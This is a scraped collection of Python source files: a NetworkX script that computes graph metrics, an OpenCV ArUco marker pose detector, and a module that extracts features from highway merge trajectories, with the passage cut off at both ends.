= Figure(data=Data([edge_trace, node_trace]), layout=Layout(\n title= relationships + ' Network Graph',\n titlefont=dict(size=16), showlegend=False,\n hovermode='closest', margin=dict(b=20,l=5,r=5,t=40),\n annotations=[ dict(\n text=\"Export to plot.ly to view the tweets and user information!\",\n showarrow=False,\n xref=\"paper\", yref=\"paper\",\n x=0.005, y=-0.002 ) ],\n xaxis=XAxis(showgrid=False, zeroline=False, showticklabels=False),\n yaxis=YAxis(showgrid=False, zeroline=False, showticklabels=False)\n ))\n div = plot(fig, output_type='div',image='png',auto_open=False, image_filename='plot_img')\n fname_div = self.DIR + '/div.dat'\n with open(fname_div,\"w\") as f:\n f.write(div)\n print(fname_div)\n\n\n def approximation(self):\n result = {}\n result['all_pairs_node_connectivity'] = nx.all_pairs_node_connectivity(self.graph)\n result['node_connectivity'] = nx.node_connectivity(self.graph)\n\n if self.directed == 'undirected':\n result['k_components'] = nx.k_components(self.graph)\n result['average_clustering'] = nx.average_clustering(self.graph)\n\n fname_approx = self.DIR + '/appoximation.json'\n with open(fname_approx,\"w\") as f:\n json.dump(result, f, cls=SetEncoder,indent=2)\n print(fname_approx)\n\n\n\n def assortativity(self):\n result = {}\n result['degree_assortativity_coefficient']=nx.degree_assortativity_coefficient(self.graph)\n\n if self.directed == 'undirected':\n result['degree_pearson_correlation_coefficient']=nx.degree_pearson_correlation_coefficient(self.graph)\n \n result['average_neighbor_degree']=nx.average_neighbor_degree(self.graph)\n result['average_degree_connectivity']=nx.average_degree_connectivity(self.graph)\n result['k_nearest_neighbors']=nx.k_nearest_neighbors(self.graph)\n\n fname_assort = self.DIR + '/assortativity.json'\n with open(fname_assort,\"w\") as f:\n json.dump(result, f, cls=SetEncoder,indent=2)\n print(fname_assort)\n\n\n\n def centrality(self):\n result = {}\n result['degree_centrality']=nx.degree_centrality(self.graph)\n\n if self.directed == 'directed':\n result['in_degree_centrality']=nx.in_degree_centrality(self.graph)\n result['out_degree_centrality']=nx.out_degree_centrality(self.graph)\n \n result['closeness_centrality']=nx.closeness_centrality(self.graph)\n result['betweenness_centrality']=nx.betweenness_centrality(self.graph)\n\n # fix the tuple cant decode into json problem\n stringify_temp={}\n temp = nx.edge_betweenness_centrality(self.graph)\n for key in temp.keys():\n stringify_temp[str(key)] = temp[key]\n result['edge_betweenness_centrality']= stringify_temp\n\n if self.directed == 'undirected':\n result['current_flow_closeness_centrality']=nx.current_flow_closeness_centrality(self.graph)\n result['current_flow_betweenness_centrality']=nx.current_flow_betweenness_centrality(self.graph)\n\n stringify_temp={}\n temp = nx.edge_current_flow_betweenness_centrality(self.graph)\n for key in temp.keys():\n stringify_temp[str(key)] = temp[key]\n result['edge_current_flow_betweenness_centrality']=stringify_temp\n \n result['approximate_current_flow_betweenness_centrality']=nx.approximate_current_flow_betweenness_centrality(self.graph)\n result['eigenvector_centrality']=nx.eigenvector_centrality(self.graph)\n result['eigenvector_centrality_numpy']=nx.eigenvector_centrality_numpy(self.graph)\n result['katz_centrality']=nx.katz_centrality(self.graph)\n result['katz_centrality_numpy']=nx.katz_centrality_numpy(self.graph)\n result['communicability']=nx.communicability(self.graph)\n result['communicability_exp']=nx.communicability_exp(self.graph)\n result['communicability_centrality']=nx.communicability_centrality(self.graph)\n result['communicability_centrality_exp']=nx.communicability_centrality_exp(self.graph)\n result['communicability_betweenness_centrality']=nx.communicability_betweenness_centrality(self.graph)\n result['estrada_index']=nx.estrada_index(self.graph)\n \n result['load_centrality']=nx.load_centrality(self.graph)\n\n stringify_temp={}\n temp = nx.edge_load(self.graph)\n for key in temp.keys():\n stringify_temp[str(key)] = temp[key]\n result['edge_load']= stringify_temp\n result['dispersion']=nx.dispersion(self.graph)\n \n fname_centra = self.DIR + '/centrality.json'\n with open(fname_centra,\"w\") as f:\n json.dump(result, f, cls=SetEncoder,indent=2)\n print(fname_centra)\n\n\n\n\n def cluster(self):\n rslt={}\n \n rslt['transitivity']=nx.transitivity(self.graph)\n rslt['square_clustering']=nx.square_clustering(self.graph)\n\n if self.directed == 'undirected':\n rslt['traingles']=nx.triangles(self.graph)\n rslt['clustering']=nx.clustering(self.graph)\n rslt['average_clustering']=nx.average_clustering(self.graph)\n\n fname_cluster = self.DIR + '/cluster.json'\n with open(fname_cluster,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_cluster)\n\n\n # only directed graph\n def component(self):\n rslt={}\n if self.directed == 'directed':\n rslt['is_strongly_connected']=nx.is_strongly_connected(self.graph)\n\n strong = nx.strongly_connected_components(self.graph)\n strong_nodes = []\n for n in strong:\n strong_nodes.append(list(n)[0])\n rslt['strongly_connected'] = strong_nodes\n\n \n rslt['number_strongly_connected_components']=nx.number_strongly_connected_components(self.graph)\n rslt['is_semiconnected']=nx.is_semiconnected(self.graph)\n\n weak = nx.weakly_connected_components(self.graph)\n weak_nodes = []\n for n in weak:\n weak_nodes.append(list(n)[0])\n rslt['wealy_connected'] = weak_nodes\n\n rslt['is_weakly_connected']=nx.is_weakly_connected(self.graph)\n rslt['number_weakly_connected_components']=nx.number_weakly_connected_components(self.graph)\n \n fname_component = self.DIR + '/component.json'\n with open(fname_component,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_component)\n\n # only undirected graph\n def distance(self):\n rslt={}\n if self.directed =='undirected':\n rslt['center']=nx.center(self.graph)\n rslt['diameter']=nx.diameter(self.graph)\n rslt['eccentricity']=nx.eccentricity(self.graph)\n rslt['periphery']=nx.periphery(self.graph)\n rslt['radius']=nx.radius(self.graph)\n\n fname_distance = self.DIR + '/distance.json'\n with open(fname_distance,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_distance)\n\n # directed\n def hierarchy(self):\n rslt={}\n\n if self.directed == 'directed':\n rslt['flow_hierarchy']=nx.flow_hierarchy(self.graph)\n rslt['isolates']=nx.isolates(self.graph)\n\n fname_hierarchy = self.DIR + '/' + 'hierarchy.json'\n with open(fname_hierarchy,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_hierarchy)\n\n\n def googleMatrix(self):\n fname = self.DIR + '/googleMatricx.txt'\n google_matrix=nx.google_matrix(self.graph)\n numpy.savetxt(fname,google_matrix)\n print(fname)\n \n\n def path(self):\n rslt={}\n rslt['shortest_path']=nx.shortest_path(self.graph)\n #rslt['average_shortest_path_length']=nx.average_shortest_path_length(self.graph)\n rslt['all_pairs_shortest_path']=nx.all_pairs_shortest_path(self.graph)\n\n fname_path = self.DIR + '/path.json'\n with open(fname_path,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_path)\n\n def tree(self):\n rslt={}\n rslt['is_tree']=nx.is_tree(self.graph)\n rslt['is_forest']=nx.is_forest(self.graph)\n\n if self.directed == 'directed':\n rslt['is_arborescence']=nx.is_arborescence(self.graph)\n rslt['is_branching']=nx.is_branching(self.graph)\n \n fname_tree = self.DIR + '/tree.json'\n with open(fname_tree,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_tree)\n\n\n # directed\n def triads(self):\n rslt={}\n if self.directed == 'directed':\n rslt['triadic_census']=nx.triadic_census(self.graph)\n fname_triads = self.DIR + '/triads.json'\n with open(fname_triads,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_triads)\n\n def vitality(self):\n rslt={}\n rslt['closeness_vitality']=nx.closeness_vitality(self.graph)\n fname_vitality = self.DIR + '/vitality.json'\n with open(fname_vitality,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_vitality)\n\n def traversal(self):\n rslt={}\n \n rslt['dfs_predecessors']=nx.dfs_predecessors(self.graph)\n rslt['dfs_successors']=nx.dfs_successors(self.graph)\n #rslt['dfs_preorder_nodes']=nx.dfs_preorder_nodes(self.graph)\n #rslt['dfs_postorder_nodes']=nx.dfs_postorder_nodes(self.graph)\n #rslt['dfs_labeled_edges']=nx.dfs_labeled_edges(self.graph)\n #rslt['edge_dfs']=nx.edge_dfs(self.graph)\n #rslt['dfs_edges']=nx.dfs_edges(self.graph)\n #rslt['dfs_tree']=nx.dfs_tree(self.graph)\n\n fname_traversal = self.DIR + '/traversal.json'\n with open(fname_traversal,\"w\") as f:\n json.dump(rslt, f, cls=SetEncoder,indent=2)\n print(fname_traversal)\n\n\nclass SetEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, set):\n return list(obj)\n if isinstance(obj, matrix):\n return str(obj)\n return json.JSONEncoder.default(self, obj)\n \n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Processing...\")\n parser.add_argument('--file', required=True)\n parser.add_argument('--layout',required=True)\n parser.add_argument('--relations',required=True)\n parser.add_argument('--prune',required=True)\n #parser.add_argument('--node_size',required=True)\n #parser.add_argument('--edge_width',required=True)\n \n args = parser.parse_args()\n\n #save arguments\n dotenv_path = join(dirname(__file__), '../../.env')\n load_dotenv(dotenv_path)\n \n uid = str(uuid.uuid4())\n DIR = os.environ.get('ROOTDIR') + os.environ.get('DOWNLOAD_NW_NETWORKX') +'/' + uid\n if not os.path.exists(DIR):\n os.makedirs(DIR)\n\n fname = DIR + '/config.dat'\n with open(fname,\"w\") as f:\n json.dump(vars(args),f)\n print(fname)\n \n network = Network(DIR, args.file, args.relations, args.prune)\n network.export_graph()\n network.draw_graph(args.relations, args.layout) #, args.node_size, args.edge_width)\n\n \n #network.approximation()\n try:\n network.assortativity()\n except:\n pass\n\n try:\n network.centrality()\n except:\n pass\n\n try:\n network.cluster()\n except:\n pass\n\n try:\n network.component()\n except:\n pass\n\n try:\n network.hierarchy()\n except:\n pass\n\n try:\n network.triads()\n except:\n pass\n \n # network.googleMatrix()\n try:\n network.path()\n except:\n pass\n try:\n network.tree()\n except:\n pass\n try:\n network.vitality()\n except:\n pass\n try:\n network.traversal()\n except:\n pass\n","repo_name":"kevinwojo/analytics-standalone","sub_path":"www/scripts/NetworkX/network_analysis.py","file_name":"network_analysis.py","file_ext":"py","file_size_in_byte":22171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14865102283","text":"import cv2\r\nimport math\r\nimport numpy as np\r\n\r\nfrom PanTilt import PanTilt as PanTilt\r\nfrom utils import ARUCO_DICT\r\n\r\n\r\nclass PoseDetector:\r\n\r\n #Check if Rotation Matrix\r\n def isRotationMatrix(R):\r\n Rt = np.transpose(R)\r\n shouldBeIdentity = np.dot(Rt, R)\r\n I = np.identity(3, dtype=R.dtype)\r\n n = np.linalg.norm(I - shouldBeIdentity)\r\n return n < 1e-6\r\n \r\n #=======================================================================================================================\r\n\t#=======================================================================================================================\r\n\r\n #Convert Rotation 3x3 Matrix to euler Angles \r\n def rotationMatrixToEulerAngles(self, R):\r\n assert (self.isRotationMatrix(R))\r\n \r\n sy = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])\r\n \r\n singular = sy < 1e-6\r\n \r\n if not singular:\r\n x = math.atan2(R[2,1], R[2,2])\r\n y = math.atan2(-R[2,0], sy)\r\n z = math.atan2(R[1,0], R[0,0])\r\n else:\r\n x = math.atan2(-R[1,2], R[1,1])\r\n y = math.atan2(-R[2,0], sy)\r\n z = 0\r\n \r\n return np.array([x, y, z]) #returns pitch, roll and yaw (units?)\r\n\r\n\r\n #=======================================================================================================================\r\n\t#=======================================================================================================================\r\n\r\n #Display Pose\r\n def Display(self,x,y,z,ex,ey,ez):\r\n print(\"===========================\")\r\n print(\"| Translation (mm) |\")\r\n print(\"===========================\")\r\n print(\"| \")\r\n print(\"| X (Red) : {:4.0f}\".format(x))\r\n print(\"| Y (Green): {:4.0f}\".format(y))\r\n print(\"| Z (Blue) : {:4.0f}\".format(z))\r\n print(\"| \")\r\n print(\"===========================\")\r\n print(\"| Rotation (euler/degree) |\")\r\n print(\"===========================\")\r\n print(\"| \")\r\n print(\"| EulX: {:4.0f}\".format(ex))\r\n print(\"| EulY: {:4.0f}\".format(ey))\r\n print(\"| EulZ: {:4.0f}\".format(ez))\r\n print(\"| \")\r\n print(\"===========================\")\r\n print(\"|Press 'q' on cap to stop|\")\r\n print(\"===========================\")\r\n print(\" \")\r\n\r\n #=======================================================================================================================\r\n\t#=======================================================================================================================\r\n\r\n\r\n #Estimate Pose Values\r\n def poseDetector(self, inputX, inputY, inputZ, tagSetting, cameraSetting):\r\n #Set Tag Type\r\n aruco_dict = cv2.aruco.getPredefinedDictionary(ARUCO_DICT[tagSetting[\"dict\"]])\r\n marker_size = tagSetting[\"tagSize\"]\r\n flip = tagSetting[\"flip\"]\r\n \r\n #Load Camera Calibration\r\n camera_matrix = np.load(\"calibration_matrix.npy\")\r\n camera_distortion = np.load(\"distortion_coefficients.npy\")\r\n\r\n\r\n\r\n #Detect\r\n if inputX == None and inputY == None and inputZ == None:\r\n follow = False\r\n \r\n \r\n #Camera Setting\r\n cap = cv2.VideoCapture(cameraSetting[\"index\"])\r\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, cameraSetting[\"width\"])\r\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, cameraSetting[\"height\"])\r\n cap.set(cv2.CAP_PROP_FPS, cameraSetting[\"fps\"])\r\n\r\n while True:\r\n #\r\n ret, frame = cap.read()\r\n\r\n #Flip Vertically and Horizontally\r\n if flip: frame = cv2.flip(frame,-1)\r\n\r\n #\r\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n #\r\n corners, ids, rejected = cv2.aruco.detectMarkers(gray_frame, aruco_dict, camera_matrix, camera_distortion)\r\n\r\n #If Marker detected\r\n if len(corners) > 0: \r\n #\r\n cv2.aruco.drawDetectedMarkers(frame, corners)\r\n \r\n #estimatePoseSingleMarkers\r\n #rvec_list_all = Rotation Vector of Marker/s from Camera\r\n #tvec_list_all = Translation Vector of Marker/s from Camera\r\n #\r\n rvec_list_all, tvec_list_all, _objPoints = cv2.aruco.estimatePoseSingleMarkers(corners, marker_size, camera_matrix, camera_distortion)\r\n \r\n #Obtain First Marker\r\n rvec = rvec_list_all[0][0]\r\n tvec = tvec_list_all[0][0]\r\n \r\n #Draw Axes on Marker\r\n cv2.drawFrameAxes(frame, camera_matrix, camera_distortion, rvec, tvec, 50)\r\n \r\n #Calculate actual 'rvec' and 'tvec'\r\n rvec_flipped = rvec * -1\r\n tvec_flipped = tvec * -1\r\n rotation_matrix, jacobian = cv2.Rodrigues(rvec_flipped)\r\n realworld_tvec = np.dot(rotation_matrix, tvec_flipped)\r\n \r\n #Translation (mm)\r\n x = realworld_tvec[0]\r\n y = realworld_tvec[1]\r\n z = realworld_tvec[2]\r\n\r\n #Euler Angles (degree)\r\n eulerX, eulerY, eulerZ = self.rotationMatrixToEulerAngles(self, rotation_matrix)\r\n\r\n #If Eye in Hand\r\n if follow:\r\n PanTilt.EyeInHand(x, y, z, math.degrees(eulerX), math.degrees(eulerY), math.degrees(eulerZ), inputX, inputY, inputZ)\r\n \r\n #Display on Command Prompt\r\n self.Display(self,x, y, z, math.degrees(eulerX), math.degrees(eulerY), math.degrees(eulerZ))\r\n\r\n #Display on output\r\n tvec_str = \"x=%4.0f y=%4.0f z=%4.0f eulerZ=%4.0f\"%(x, y, z, math.degrees(eulerZ))\r\n cv2.putText(frame, tvec_str, (20, 40), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2, cv2.LINE_AA)\r\n \r\n #\r\n cv2.imshow(\"Pose Estimation - Press 'q' to stop\", frame) \r\n\r\n #Check for exit\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord('q'): break\r\n \r\n #\r\n cap.release()\r\n cv2.destroyAllWindows()","repo_name":"DSLeong/PoseDetectorPi","sub_path":"tkGUI/PoseDetector.py","file_name":"PoseDetector.py","file_ext":"py","file_size_in_byte":6381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"40630519460","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 23 18:11:36 2016\n\n@author: Derek\n\"\"\"\n\nfrom utils import frame_util as futil\nimport numpy as np\nimport os\nfrom scipy import sparse\nfrom utils import constants\nfrom utils import vehicleclass as v\nimport time\nimport random\n\n\nnumUsing = 0 # 0 to use all\n\n'''Returns the startX and startY for all merge vehicles'''\ndef getStartVals(filename):\n filepath = makeFullPath(filename, '-mergerStartTrajectories.txt')\n A = np.loadtxt(filepath)\n return A[:,[constants.LocalX,constants.LocalY]]\n\n'''Removes the entry corresponding to this vid from the grid'''\ndef removeIDfromGrid(Frame, VID, Grid, compressed):\n #vehicleTraj = Frame[VID]\n if VID not in Frame:\n return Grid\n vehicleData = Frame[VID]\n veh = v.vehicle(vehicleData, compressed)\n xpos = veh.x\n ypos = veh.y\n #[xpos,ypos]=vehicleTraj[[constants.LocalX,constants.LocalY]]\n indexX, indexY = futil.GetGridIndices(xpos,ypos)\n if futil.InGridBounds(veh.getX(), veh.getY()):\n if Grid[indexX][indexY][0] > 1:\n Grid[indexX][indexY][0] = Grid[indexX][indexY][0]-1\n #recalculate velocities?\n else:\n Grid[indexX][indexY] = [0]*len(veh.GridInfo)\n return Grid\n\n'''Called for each merging vehicle, gets all the input data.'''\ndef getXInner(row,dictOfGrids, initPos, dictOfFrames, compressed):\n VID = row[0]\n start = row[1]\n X_for_id = np.array([]) #This will have numFrames rows and sizeGrid+1 columns\n for frame in range(row[1],row[2]):\n t_elapsed = frame-start \n #grid = dictOfGrids[frame]\n #grid = removeIDfromGrid(dictOfFrames[frame],VID,grid, compressed)\n start_grid = dictOfGrids[start]\n start_grid = removeIDfromGrid(dictOfFrames[start],VID,start_grid, compressed)\n \n #grid2 = dictOfGrids[frame-10]\n #grid2 = removeIDfromGrid(dictOfFrames[frame-10],VID,grid2)\n \n init_grid_avg = futil.getGridMeans(dictOfGrids[frame])\n \n #additional = np.append(t_elapsed, grid2.flatten())\n additional = np.append(initPos,t_elapsed)\n #additional = t_elapsed \n Xrow = np.append(additional,start_grid.flatten())\n #Xrow = np.append(additional,init_grid_avg)\n #Xrow = additional\n Xrow.shape = (1,len(Xrow))\n if X_for_id.shape == (0,):\n X_for_id = Xrow\n else:\n X_for_id = np.append(X_for_id,Xrow,axis=0)\n # Xi = np.append(Xi, initPos)\n # Xi.shape = (1,len(Xi))\n return (X_for_id)\n\n'''Gets ground truths for each merge vehicle'''\ndef getYInner(row, dictOfFrames, predict, compressed):\n y_for_id = np.array([]) #this will have numFrames rows and 1 column\n for frame in range(row[1],row[2]):\n veh = v.vehicle(dictOfFrames[frame], compressed)\n if predict == 'Y':\n yrow = veh.y\n elif predict == 'X':\n yrow = veh.x\n else:\n print(\"ERROR: invalid prediction request:\", predict)\n return None\n y_for_id = np.append(y_for_id,yrow)\n return y_for_id\n\n'''AVOID---This probably uses a significant amount of memory'''\ndef append(orig, add, axisNum=0):\n if orig.shape == (0,):\n orig = add\n else:\n orig = np.append(orig,add,axis=axisNum)\n return orig\n\n#get the training examples\ndef getX(filename, trainIDs, testIDs, mean_centered):\n #filename=\"res/101_trajectories/aug_trajectories-0750am-0805am.txt\"\n path = os.getcwd()+'/'\n compressed = 'compressed' in filename\n frameDict = futil.LoadDictFromTxt(path+filename, 'frame')\n print(\"Gotten frameDict\",time.ctime())\n dictOfGrids = futil.GetGridsFromFrameDict(frameDict, mean_centered, compressed)\n print(\"Gotten dictOfGrids\",time.ctime())\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n '''MR=MergeRanges. MR[:,0]=merge ids, MR[:,1]=start frame, MR[:,2] = end'''\n print (\"Done loading in getX\", time.ctime())\n start = getStartVals(filename) \n Xtrain = np.array([]) #will have numTrain*numFrames rows and size(grid)+1 columns\n Xtest = np.array([])\n it = 0\n trainEmpty = True\n testEmpty = True\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n thisStart = start[it]\n XVID = sparse.csr_matrix(np.ascontiguousarray(getXInner(row, dictOfGrids,thisStart,frameDict, compressed)))\n if row[0] in trainIDs:\n if trainEmpty == True:\n Xtrain = XVID\n trainEmpty = False\n else:\n Xtrain = sparse.vstack((Xtrain,XVID))#,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a training example\", time.ctime())\n else:\n if testEmpty == True:\n Xtest = XVID\n testEmpty = False\n else:\n Xtest = sparse.vstack((Xtest,XVID))#np.append(Xtest,XVID,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a test example\")\n it += 1\n print(Xtrain.shape)\n return Xtrain, Xtest\n\ndef getXClusters(filename, trainIDs, testIDs, mean_centered, clusterIDs0, clusterIDs1, clusterIDs2):\n #filename=\"res/101_trajectories/aug_trajectories-0750am-0805am.txt\"\n path = os.getcwd()+'/'\n compressed = 'compressed' in filename\n frameDict = futil.LoadDictFromTxt(path+filename, 'frame')\n print(\"Gotten frameDict\",time.ctime())\n dictOfGrids = futil.GetGridsFromFrameDict(frameDict, mean_centered, compressed)\n print(\"Gotten dictOfGrids\",time.ctime())\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n '''MR=MergeRanges. MR[:,0]=merge ids, MR[:,1]=start frame, MR[:,2] = end'''\n print (\"Done loading in getX\", time.ctime())\n start = getStartVals(filename) \n Xtrain1 = np.array([])\n Xtrain2 = np.array([])\n Xtrain0 = np.array([]) #will have numTrain*numFrames rows and size(grid)+1 columns\n Xtest1 = np.array([])\n Xtest2 = np.array([])\n Xtest0 = np.array([])\n it = 0\n trainEmpty = [True]*3\n testEmpty = [True]*3\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n thisStart = start[it]\n XVID = sparse.csr_matrix(np.ascontiguousarray(getXInner(row, dictOfGrids,thisStart,frameDict, compressed)))\n if row[0] in trainIDs:\n if row[0] in clusterIDs0:\n if trainEmpty[0] == True:\n Xtrain0 = XVID\n trainEmpty[0] = False\n else:\n Xtrain0 = sparse.vstack((Xtrain0,XVID))#,axis=0)\n elif row[0] in clusterIDs1:\n if trainEmpty[1] == True:\n Xtrain1 = XVID\n trainEmpty[1] = False\n else:\n Xtrain1 = sparse.vstack((Xtrain1,XVID))#,axis=0)\n elif row[0] in clusterIDs2:\n if trainEmpty[2] == True:\n Xtrain2 = XVID\n trainEmpty[2] = False\n else:\n Xtrain2 = sparse.vstack((Xtrain2,XVID))#,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a training example\", time.ctime())\n else:\n if row[0] in clusterIDs0:\n if testEmpty[0] == True:\n Xtest0 = XVID\n testEmpty[0] = False\n else:\n Xtest0 = sparse.vstack((Xtest0,XVID))#,axis=0)\n elif row[0] in clusterIDs1:\n if testEmpty[1] == True:\n Xtest1 = XVID\n testEmpty[1] = False\n else:\n Xtest1 = sparse.vstack((Xtest1,XVID))#,axis=0)\n elif row[0] in clusterIDs2:\n if testEmpty[2] == True:\n Xtest2 = XVID\n testEmpty[2] = False\n else:\n Xtest2 = sparse.vstack((Xtest2,XVID))#,axis=0)\n #Xtest = sparse.vstack((Xtest,XVID))#np.append(Xtest,XVID,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a test example\")\n it += 1\n return Xtrain0, Xtrain1, Xtrain2, Xtest0, Xtest1, Xtest2\n \ndef getYClusters(filename, trainIDs, testIDs, predict, clusterIDs0, clusterIDs1, clusterIDs2):\n path = os.getcwd()+'/'\n IDDict = futil.LoadDictFromTxt(path+filename, 'vid')\n compressed = 'compressed' in filename\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n Ytrain0 = np.array([]) \n Ytrain1 = np.array([])\n Ytrain2 = np.array([]) #will have numTrain*numFrames rows and 1 column\n Ytest0 = np.array([])\n Ytest1 = np.array([]) \n Ytest2 = np.array([])\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n YVID = np.ascontiguousarray(getYInner(row,IDDict[row[0]], predict, compressed))\n if row[0] in trainIDs:\n if row[0] in clusterIDs0:\n Ytrain0=append(Ytrain0,YVID)\n elif row[0] in clusterIDs1:\n Ytrain1=append(Ytrain1,YVID)\n elif row[0] in clusterIDs2:\n Ytrain2=append(Ytrain2,YVID)\n #uses append because Y is small in memory\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a training example\")\n else:\n if row[0] in clusterIDs0:\n Ytest0=append(Ytest0,YVID)\n elif row[0] in clusterIDs1:\n Ytest1=append(Ytest1,YVID)\n elif row[0] in clusterIDs2:\n Ytest2=append(Ytest2,YVID)\n #Ytest=append(Ytest,YVID)\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a test example\")\n return np.ascontiguousarray(Ytrain0),np.ascontiguousarray(Ytrain1), np.ascontiguousarray(Ytrain2), np.ascontiguousarray(Ytest0), np.ascontiguousarray(Ytest1), np.ascontiguousarray(Ytest2)\n\ndef getY(filename, trainIDs, testIDs, predict):\n path = os.getcwd()+'/'\n IDDict = futil.LoadDictFromTxt(path+filename, 'vid')\n compressed = 'compressed' in filename\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n Ytrain = np.array([]) #will have numTrain*numFrames rows and 1 column\n Ytest = np.array([])\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n YVID = np.ascontiguousarray(getYInner(row,IDDict[row[0]], predict, compressed))\n if row[0] in trainIDs:\n Ytrain=append(Ytrain,YVID) #uses append because Y is small in memory\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a training example\")\n else:\n Ytest=append(Ytest,YVID)\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a test example\")\n return np.ascontiguousarray(Ytrain), np.ascontiguousarray(Ytest)\n \ndef makePathMR(filename, end):\n path = os.getcwd()+'/'\n a = len('aug_trajectories-0750am-0805am.txt')\n return path+filename[:-a]+filename[(-a+4):-4]+end+'.txt'\n\ndef getSpan(filename):\n return filename[-17:][:-4]\n \ndef makePathToTrajectories(filename):\n outerFolder = filename[4:-35]\n path1 = os.getcwd() + '/res' + '/' + outerFolder + '/' \n path = path1 + getSpan(filename) + '/' \n if not os.path.exists(path):\n os.makedirs(path) \n return path\n\ndef makeFullPath(filename, end=''):\n path = makePathToTrajectories(filename)\n return path + end\n\ndef makeTrainTestData(filename, portionTrain, seed=None):\n # example filename=\"res/101_trajectories/aug_trajectories-0750am-0805am.txt\"\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n traintest = [[],[]]\n random.seed(seed)\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n traintest[random.random() > portionTrain].append(row[0])\n train = traintest[0]\n test = traintest[1]\n filepathTrain = makeFullPath(filename, 'trainIDs.txt')\n filepathTest = makeFullPath(filename, 'testIDs.txt')\n np.savetxt(filepathTrain, train)\n np.savetxt(filepathTest, test)\n return train, test\n\ndef loadTrainTestData(filename):\n filepathTrain = makeFullPath(filename, 'trainIDs.txt')\n filepathTest = makeFullPath(filename, 'testIDs.txt')\n trainIDs = np.loadtxt(filepathTrain)\n testIDs = np.loadtxt(filepathTest)\n return trainIDs, testIDs\n\ndef saveSparse(filepath, X):\n if X.shape == (0,):\n return\n data = X.data\n indices = X.indices\n indptr = X.indptr\n np.savetxt(filepath + '-data',data)\n np.savetxt(filepath + '-indices',indices)\n np.savetxt(filepath + '-indptr',indptr)\n\ndef loadSparse(filepath):\n data = np.loadtxt(filepath + '-data')\n indices = np.loadtxt(filepath + '-indices')\n indptr = np.loadtxt(filepath + '-indptr')\n return sparse.csr_matrix((data,indices,indptr))\n \ndef saveExampleData(filename,Xtrain,ytrain,Xtest,ytest, mean_centered, predict):\n filepath_Xtrain = makeFullPath(filename, '-Xtrain'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain)\n filepath_ytrain = makeFullPath(filename, '-ytrain'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain)\n filepath_Xtest = makeFullPath(filename, '-Xtest'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest)\n filepath_ytest = makeFullPath(filename, '-ytest'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest)\n\ndef readExampleData(filename, mean_centered, predict):\n filepath_Xtrain = makeFullPath(filename, '-Xtrain'+str(mean_centered))\n Xtrain = loadSparse(filepath_Xtrain)\n print(\"Xtrain loaded.\",time.ctime())\n filepath_Xtest = makeFullPath(filename, '-Xtest'+str(mean_centered))\n Xtest = loadSparse(filepath_Xtest)\n print(\"Xtest loaded.\",time.ctime())\n filepath_ytrain = makeFullPath(filename, '-ytrain'+str(mean_centered)+predict)\n ytrain = np.loadtxt(filepath_ytrain)\n print(\"ytrain loaded.\",time.ctime())\n filepath_ytest = makeFullPath(filename, '-ytest'+str(mean_centered)+predict)\n ytest = np.loadtxt(filepath_ytest)\n print(\"ytest loaded.\",time.ctime())\n return Xtrain, ytrain, Xtest, ytest\n \ndef saveExampleDataClusters(filename, Xtrain0, Xtrain1, Xtrain2, ytrain0, ytrain1, ytrain2,\n Xtest0, Xtest1, Xtest2, ytest0, ytest1, ytest2,\n mean_centered, predict):\n filepath_Xtrain = makeFullPath(filename, '-Xtrain0'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain0)\n filepath_Xtrain = 